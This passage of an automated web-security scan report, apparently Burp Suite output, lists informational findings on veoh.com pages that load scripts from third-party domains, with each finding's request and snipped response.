The response dynamically includes the following scripts from other domains:

Request

GET /browse/webseries/featured/1 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:36:32 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=94
Content-Length: 65871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296768992"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.441. http://www.veoh.com/bulletin  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /bulletin

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /bulletin HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:38 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=89
Content-Length: 27466

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.442. http://www.veoh.com/collection/Veoh-Editor-Picks  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /collection/Veoh-Editor-Picks

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /collection/Veoh-Editor-Picks HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:34 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=85
Content-Length: 105468

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
<!-- Browser: ie 7.0 -->
<script type="text/javascript" src="http://cdn.taboolasyndication.com/libtrc/veoh/rbox.js?video_id="></script>
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
<div id="contentHolder" class="">
                   <script type="text/javascript" src="http://api.conduit.com/ToolbarApi.js"></script>
...[SNIP]...
<!-- qlipso client -->
           <script type="text/javascript" src="http://www.qlipso.com/share/scripts/qlipso.js?v=1.0.1.1215b"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://www.qlipso.com/share/scripts/QlipsoConfig.js?v=1296769594"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...

19.443. http://www.veoh.com/corporate/aboutus  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/aboutus

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /corporate/aboutus HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:24 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=69
Content-Length: 26605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.444. http://www.veoh.com/corporate/copyright  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/copyright

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /corporate/copyright HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:32 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=68
Content-Length: 29638

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.445. http://www.veoh.com/corporate/pressroom  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/pressroom

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /corporate/pressroom HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:25 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=92
Content-Length: 39434

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.446. http://www.veoh.com/corporate/privacypolicy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/privacypolicy

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /corporate/privacypolicy HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:33 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=21
Content-Length: 36356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.447. http://www.veoh.com/corporate/termsofuse  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /corporate/termsofuse

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /corporate/termsofuse HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:29 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=86
Content-Length: 61158

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.448. http://www.veoh.com/download  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /download

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /download HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=6
Content-Length: 25488

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.449. http://www.veoh.com/download/index/permalinkId/v18978294NGnK88j8  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /download/index/permalinkId/v18978294NGnK88j8

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /download/index/permalinkId/v18978294NGnK88j8 HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:46:49 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=82
Content-Length: 27106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
<script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.450. http://www.veoh.com/faq  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /faq

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /faq HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fbsetting_f8c7347543a5d2e2d76864f96079fa3d=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; vvt="2&Fri, 04 Feb 2011 20:53:09 GMT"; JSESSIONID=A69BE775AA07CEC6650BA5B4C7A69499; __utmv=; veohSessionCookie=2dc7ebaa-c348-4308-aec4-b00f6b13e6ca; __utmz=91933981.1296766388.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; base_domain_f8c7347543a5d2e2d76864f96079fa3d=veoh.com; veohCookie="VisitorUID=6558E906-0733-C0CD-6764-D7943E04BA3B&LastUpdate=03/Feb/2011:12:31:38 -0800&first=0"; __utma=91933981.1108194640.1296766388.1296766388.1296766388.1; __utmc=91933981; __qca=P0-1750536792-1296766390251; __utmb=91933981.2.10.1296766388;

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 21:47:39 GMT
Connection: close
Server: Apache/2.2.10 (Unix) PHP/5.2.6
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Keep-Alive: timeout=5, max=96
Content-Length: 24099

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<body>
       <script src="http://www.google-analytics.com/ga.js" type="text/javascript"></script>
...[SNIP]...
</script>


<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div>

<script type="text/javascript" src="http://ll.static.abc.go.com/s/syn/remoteplayer?partner=veoh"></script>
<script type="text/javascript" src="http://m2.fwmrm.net/g/lib/1.1/js/fwjslib.js?version=1.1"></script>
<!-- JS for Adap.tv -->
<script type="text/javascript" src="http://redir.adap.tv/redir/javascript/lightintegration.js"></script>

<script type="text/javascript" src="http://insight-s3.exelator.com/i200512.js"></script>
...[SNIP]...

19.451. http://www.veoh.com/favorites  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.veoh.com
Path:   /favorites

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /favorites HTTP/1.1
Host: www.veoh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
